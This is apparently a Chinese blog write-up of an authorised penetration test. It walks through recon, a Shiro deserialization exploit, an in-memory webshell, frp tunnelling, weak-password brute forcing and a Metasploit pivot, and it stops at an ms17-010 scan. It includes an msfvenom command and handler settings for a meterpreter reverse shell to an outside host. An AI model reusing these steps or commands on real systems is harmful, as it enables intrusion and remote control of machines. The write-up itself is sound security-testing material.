主页 > 网络知识 > 一步步获取你的核心权限

一步步获取你的核心权限

 

一步步获取你的核心权限

 

背景

最近都在做渗透测试项目,并不需要内网渗透,少了很多的成就感。于是,找了一个授权的企业项目,目标是获取内网核心权限,手段不限。这就好说了,就喜欢这种能让我胡乱来的目标。

入口

对于企业而言,散落在外的资产肯定还有不少,于是为了快速打点,先进行一波常规的信息收集。先进行了子域名爆破、fofa、谷歌等方式找到多个子域,通过其中一个子域名反查找IP,在历史解析记录中找到了真实的IP,再继续进行C段端口扫描,收集到了多个资产列表。扔进XRAY跑一波,在其中的一个资产中,发现了存在shiro反序列话漏洞,手工来测试一下:

 

一步步获取你的核心权限

 

github上找个了工具尝试一下,发现可以执行命令:

 

一步步获取你的核心权限

 

查看了一下进程后,发现web是以jar包启动的,无法直接写入shell,直接尝试写内存shell:

 

一步步获取你的核心权限

 

成功写入了蚁剑的shell,先本地配置一下,并设置Accept-Header为:thisIsMyJob!@

 

一步步获取你的核心权限

 

设置好后直接连接,获取webshell:

 

一步步获取你的核心权限

 

内网漫游

翻看了一下这台linux上的文件,由于linux权限不够,无法查看shadow,尝试提权也均失败了,查看历史命令、计划任务等,并未有什么收获。只能下载jar包下来分析,找到了mysql数据库的配置密码。于是先探测一下内网,看能否快速的拿到其他主机的权限,不行再从数据库入手看看。

因此,先做了个代理,配置一下frp,先上传客户端到web上,修改了一下frpc.ini文件,使用sock代理:

 

一步步获取你的核心权限

 

自己的VPS上传服务端,修改一下权限,直接执行./frps -c frps.ini:

 

一步步获取你的核心权限

 

然后回到客户端执行一下./frpc -c frpc.ini,即可使用。

本地使用proxifier代理一下:

 

一步步获取你的核心权限

 

先使用弱口令爆破工具爆破一波看看,果然有点东西,找到了两台linux弱口令:

 

一步步获取你的核心权限

 

继续翻文件,还是一无所获,浪费了很多时间。可能核心业务不在linux上,尝试一下能否获取一个windows权限。先试试ms17-010漏洞,先生成一个木马:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=2233 -f elf > linux.elf

上传到web上,本地msf监听一下:

use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp show options set LHOST 1.1.1.1 set LPORT 23333 run

在web的命令行下给linux.elf添加执行权限后直接运行,即可获取到meterpreter。然后再添加一下路由:

 

一步步获取你的核心权限

 

使用17-010扫描模块跑一下:

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!